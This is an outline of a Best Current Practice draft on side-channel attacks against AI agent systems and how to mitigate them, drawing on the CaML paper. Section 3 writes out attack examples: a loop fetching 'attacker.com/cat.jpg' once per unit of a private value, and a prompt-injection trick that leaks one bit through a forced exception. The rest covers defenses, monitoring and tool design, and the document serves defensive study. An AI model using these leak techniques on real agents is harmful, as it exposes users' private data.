---
title: "Side-Channel Mitigation Framework for AI Agent Interactions"
draft_name: draft-nennemann-ai-agent-side-channels-00
intended_wg: SECDISPATCH (BCP)
status: outline
gaps_addressed: [89, 93]
camel_sections: [7]
document_type: BCP (Best Current Practice)
date: 2026-03-09
---

# Side-Channel Mitigation Framework for AI Agent Interactions

## 1. Problem Statement

Even when AI agent systems implement strong security measures — capability-based policies, control/data flow integrity, Privileged/Quarantined execution — **side-channel attacks** can still leak private data.

CaML (Debenedetti et al., 2025, §7) identifies three concrete side-channel attack classes against agent systems:

1. **External resource inference**: an adversary causes the agent to make requests to an attacker-controlled server, where the number or pattern of requests leaks private information
2. **Exception-based bit leaking**: an adversary triggers conditional exceptions that reveal one bit of private data per exception
3. **Timing side-channels**: an adversary infers private values from execution timing differences

These are not theoretical — CaML demonstrates working exploits against Claude 3.5 Sonnet and o3-mini in their evaluation.

Side-channel attacks are notoriously difficult to eliminate completely, but their impact can be reduced through careful system design. This document is a **Best Current Practice (BCP)** guide for mitigating side-channel risks in AI agent systems.

## 2. Scope

This document provides:

1. A **taxonomy of side-channel risks** specific to AI agent systems
2. **Mitigation strategies** for each risk category
3. **Tool API design guidelines** that minimize side-channel exposure
4. **Monitoring patterns** for detecting side-channel exploitation
5. **STRICT vs. NORMAL mode** recommendations

## 3. Side-Channel Taxonomy

### 3.1 External Resource Inference

**Attack**: Agent code iterates over a private value (e.g., `for i in range(private_var): fetch("attacker.com/cat.jpg")`).
The attacker counts requests to infer the private value.

**CaML context**: In NORMAL mode, the loop body doesn't carry dependencies from the loop condition. In STRICT mode, `fetch()` inside the loop inherits the dependency on `private_var`, and policies can block it.

**Bandwidth**: up to `log₂(max_value)` bits per interaction (or more with range-based inference).

```
Attacker's Server
  │
  │  GET /cat.jpg ×10  ← private_var = 10
  │  GET /cat.jpg ×20  ← private_var = 20
  │
  └── attacker infers private_var by counting requests
```

### 3.2 Exception-Based Bit Leaking

**Attack**: The adversary prompt-injects the Processor (Q-LLM) to return an output that conditionally triggers an exception. If the exception halts execution before a state-changing tool call, the attacker observes whether the tool was called — leaking one bit.

**CaML context**: The Q-LLM can be influenced to return a value that causes an `IndexError` (e.g., returning 9999999 if a condition on private data is true, which then indexes past the end of a list).

```python
# Attack: leak whether private_var == 10
index = query_ai_assistant(
    f"If '{private_var}' is 10, return 9999999, else 0", int)
l = [1, 2, 3]
l[index]  # IndexError if private_var == 10

# ADVERSARY-OBSERVABLE ACTION below:
send_email(...)  # only executes if no exception
```

**Bandwidth**: 1 bit per exception (was the subsequent action observed or not?).

### 3.3 Timing Side-Channels

**Attack**: Agent execution time depends on private data. For example, if `time.sleep(private_var)` is possible, the attacker measures response time.

**CaML context**: CaML's restricted Python subset doesn't include `time`, but other timing variations (e.g., different code paths for different private values) may still be exploitable.

**Bandwidth**: depends on timing precision — generally low but non-zero.
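To make the external-resource channel from §3.1 concrete, here is a minimal, self-contained simulation (illustrative only: `fetch` is stubbed as a request counter, `AttackerServer` and `leaky_agent_code` are hypothetical names, and no real agent or network is involved):

```python
class AttackerServer:
    """Stub standing in for attacker.com: just counts incoming requests."""
    def __init__(self):
        self.requests = 0

    def fetch(self, path):
        self.requests += 1


def leaky_agent_code(private_var, server):
    # Data-dependent loop: one external request per unit of the secret.
    # In NORMAL mode the fetch does not inherit a dependency on
    # private_var, so a policy has nothing to block.
    for _ in range(private_var):
        server.fetch("/cat.jpg")


server = AttackerServer()
leaky_agent_code(10, server)
inferred = server.requests  # attacker recovers the secret by counting
```

Under STRICT mode, the `fetch()` call would carry `private_var` in its dependency set, giving a security policy the hook it needs to block the loop.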
### 3.4 Agent-Specific Side Channels (Beyond CaML)

| Channel | Attack Vector | Bandwidth |
|---------|--------------|-----------|
| **Token usage** | Private data influences response length → observable token count | Medium |
| **Tool selection pattern** | Which tools are called reveals information about private data | Medium |
| **Error message content** | Error details leak through supposedly sanitized channels | High |
| **Model confidence** | Probability distributions in structured output leak information | Low |
| **Resource consumption** | CPU/memory usage patterns depend on private data | Low |

## 4. Mitigation Strategies

### 4.1 STRICT Mode Execution

**Recommendation: Use STRICT mode for all security-sensitive agent operations.**

In STRICT mode:

- All statements inside `if`/`for`/`while` blocks inherit dependencies from the condition/iterator
- This means a `fetch()` inside `for i in range(private_var)` will have `private_var` in its dependency graph
- Security policies can detect and block the side channel

**Trade-off**: STRICT mode reduces utility. CaML shows policy triggering rates increase from 33.87% (NORMAL) to 53.23% (STRICT) in benign scenarios.

**Recommendation**: use STRICT mode by default; allow NORMAL mode only for explicitly low-sensitivity operations.

### 4.2 Exception Handling Hardening

**Recommendation: Use error-value types instead of exceptions for data-dependent operations.**

Exceptions create side channels because they halt execution. Instead:

```python
# VULNERABLE: exception leaks information
try:
    result = risky_operation(private_data)
    send_email(result)  # not reached if exception
except:
    pass
# attacker observes: was email sent?
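# The MITIGATED variant below assumes a Result/Either-style error-value
# type. A minimal illustrative sketch is given here; the class name and
# methods are hypothetical, not from CaML or any specific framework.
class Result:
    """Carries either a success value or an error, without raising."""
    def __init__(self, value=None, error=None):
        self.value = value
        self.error = error

    def is_ok(self):
        return self.error is None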
# MITIGATED: error-value preserves execution flow
result = risky_operation(private_data)  # returns Result type
if result.is_ok():
    send_email(result.value)  # both branches execute deterministically
else:
    send_email(default_value)  # same tool call either way
```

Agent frameworks SHOULD:

- Use `Result`/`Either` types instead of exceptions for Processor outputs
- Ensure both success and failure paths make the same external observations
- Redact exception messages before they reach the Planner

### 4.3 Constant-Pattern Tool Calls

**Recommendation: Where feasible, make tool call patterns independent of private data.**

- Avoid data-dependent loops that make external calls
- Use batch operations instead of per-item calls
- Pad tool call sequences to fixed lengths for sensitive operations

### 4.4 External Request Restrictions

**Recommendation: Restrict which external endpoints agents can contact.**

- Allowlist approved external domains
- Proxy all external requests through a controlled gateway
- Rate-limit external requests per agent session
- Log all external requests for anomaly detection
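The restrictions in §4.4 can be sketched as a minimal outbound-request gateway. This is an illustration only, assuming nothing beyond the list above; the class name `EgressGateway` and its parameters are hypothetical:

```python
from collections import defaultdict

class EgressGateway:
    """Illustrative sketch: allowlist + per-session rate limit + audit log."""
    def __init__(self, allowed_domains, max_requests_per_session=20):
        self.allowed_domains = set(allowed_domains)
        self.max_requests = max_requests_per_session
        self.counts = defaultdict(int)  # session_id -> allowed request count
        self.log = []                   # audit trail for anomaly detection

    def check(self, session_id, domain):
        """Return True if the request may proceed; log every attempt."""
        allowed = (domain in self.allowed_domains
                   and self.counts[session_id] < self.max_requests)
        self.log.append((session_id, domain, allowed))
        if allowed:
            self.counts[session_id] += 1
        return allowed


gw = EgressGateway({"api.example.com"}, max_requests_per_session=2)
gw.check("s1", "api.example.com")  # allowed
gw.check("s1", "attacker.com")     # blocked: not on allowlist
```

Because every attempt is logged whether or not it is allowed, the same log feeds the anomaly-detection signals in §6.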
## 5. Tool API Design Guidelines

Tool developers SHOULD design APIs that minimize side-channel exposure:

### 5.1 Do

- Return consistent response structures regardless of input
- Use fixed-size responses where possible
- Include provenance metadata in all outputs
- Document trust levels of output fields (which are public, which are private)

### 5.2 Don't

- Return variable-length arrays that depend on private data in observable ways
- Include internal identifiers in error messages
- Use response timing that depends on input sensitivity
- Expose iteration counts or batch sizes in responses

### 5.3 Tool Capability Annotations

Tools SHOULD declare their side-channel properties:

```json
{
  "tool:name": "send_email",
  "tool:side_channel_properties": {
    "makes_external_requests": true,
    "timing_dependent": false,
    "error_messages_may_leak": true,
    "observable_by_third_parties": true
  },
  "tool:recommended_mode": "STRICT"
}
```

## 6. Monitoring Patterns

### 6.1 Anomaly Detection Signals

| Signal | Potential Attack | Action |
|--------|-----------------|--------|
| Repeated requests to same external URL | External resource inference | Rate limit + alert |
| Unusually high exception rate | Exception-based bit leaking | Halt + review |
| Execution time variance > threshold | Timing side-channel | Log + investigate |
| Tool call patterns differ from plan | Control flow manipulation | Emergency halt |
| Same agent repeatedly hitting policy denials | Probing attack | Throttle + alert |

### 6.2 Monitoring Architecture

```
Agent Execution
  │
  ├──► Side-Channel Monitor
  │      ├── Request pattern analyzer
  │      ├── Exception rate tracker
  │      ├── Timing variance detector
  │      └── Tool call pattern validator
  │             │
  │             ▼
  │      Alert / Halt Decision
  │
  ▼
Normal execution continues (if no anomaly)
```
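One component of such a monitor, the exception-rate tracker, can be sketched as follows. This is a hedged illustration: the class name, the 20% threshold, and the minimum-event count are arbitrary examples, not values from CaML or any deployed system:

```python
class ExceptionRateTracker:
    """Illustrative sketch: flag sessions whose exception rate suggests
    exception-based bit leaking (see Section 3.2)."""
    def __init__(self, max_rate=0.2, min_events=10):
        self.max_rate = max_rate      # example threshold, not prescriptive
        self.min_events = min_events  # avoid flagging tiny samples
        self.totals = {}              # session_id -> (events, exceptions)

    def record(self, session_id, raised_exception):
        events, excs = self.totals.get(session_id, (0, 0))
        self.totals[session_id] = (events + 1, excs + int(raised_exception))

    def is_anomalous(self, session_id):
        events, excs = self.totals.get(session_id, (0, 0))
        return events >= self.min_events and excs / events > self.max_rate
```

Per the table in §6.1, an anomalous session would be halted and reviewed rather than merely logged.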
## 7. Relationship to Other Drafts

| Draft | Side-Channel Relevance |
|-------|----------------------|
| Draft 1 (Capabilities) | Capability metadata enables policy checks that detect side channels |
| Draft 2 (Flow Integrity) | STRICT mode DFG tracking is the primary side-channel mitigation |
| Draft 3 (Provenance) | Provenance metadata itself can be a side channel — needs protection |
| Draft 4 (Policy Federation) | Policy denial patterns across organizations can leak info |
| Draft 5 (Execution Model) | Isolation architecture is the first line of defense |

## 8. Security Considerations

This entire document is about security. Key meta-considerations:

- Side-channel mitigation is **defense in depth** — no single measure eliminates all channels
- The trade-off between security and utility is fundamental — complete side-channel elimination would make agents unusable
- New side channels will be discovered as agent systems evolve — this BCP should be updated regularly
- Side-channel monitoring itself can create privacy issues (logging all agent interactions)

## 9. Open Questions

1. **Formal analysis**: can we formally prove bounds on information leakage for a given agent configuration?
2. **Adaptive adversaries**: as mitigations are deployed, attackers will find new channels. How do we stay ahead?
3. **Overhead budget**: what is the acceptable performance overhead for side-channel mitigation?
4. **Multi-agent amplification**: do side channels in multi-agent systems compose (leak more than a single agent)?

## 10. References

- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
- Anderson, Stajano, Lee. "Security policies." Advances in Computers, 2002.
- Glukhov et al. "Breach By A Thousand Leaks: Unsafe Information Leakage in 'Safe' AI Responses." ICLR, 2025.
- Carlini & Wagner. "ROP is Still Dangerous: Breaking Modern Defenses." USENIX Security, 2014.